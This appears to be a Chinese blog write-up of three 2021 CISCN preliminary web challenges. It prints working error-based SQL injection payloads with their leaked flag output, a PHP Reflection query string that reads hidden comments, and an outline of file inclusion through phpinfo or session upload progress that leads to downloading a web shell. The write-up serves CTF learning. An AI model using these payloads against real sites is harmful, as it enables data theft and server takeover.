比赛名称:
2021CISCN 初赛

# easy_sql:

join 爆列名

admin')||extractvalue(1,concat(0x7e,(select * from (select * from flag as a join (select * from flag)b using(id,no))c)))#
//Duplicate column name 'e0f1d955-bbba-43c3-b078-a81b3fc4bf28'
admin')||(extractvalue(1,concat(0x7e,(select `e0f1d955-bbba-43c3-b078-a81b3fc4bf28` from security.flag),0x7e)))#
//XPATH syntax error: '~CISCN{JgHhs-jpd52-iJk4O-MGPDz-d'
admin')||(extractvalue(1,concat(0x7e,substr((select `e0f1d955-bbba-43c3-b078-a81b3fc4bf28` from security.flag),32,50),0x7e)))#
//XPATH syntax error: '~uFWI-}~'

知道列名和表,之后就是直接查询就行了

❤这个是知识盲区,以后一定要熟练掌握

# easy_source

原题,ReflectionMethod 构造 User 类中的函数方法,再通过 getDocComment 获取函数的注释

提交参数:

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

🎃学习了 php 的一些内置函数

# middle_source

首页给了任意文件包含

扫目录得到.listing,得到 you_can_seeeeeeee_me.php 是 phpinfo 页面

有了 phpinfo 可以尝试直接向 phpinfo 页面传文件加垃圾数据,同时从 phpinfo 获取临时文件名进行文件包含,或者利用 session.upload_progress 进行 session 文件包含

😀我直接好家伙,学习了 phpinfo 的俩种利用姿势 !

从 phpinfo 得到了 session 保存路径:/var/lib/php/sessions/fccecfeaje/

尝试发现可以出网,虽然 ban 了很多函数,但是可以直接用 copy 或 file_get_contents 下载 shell

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝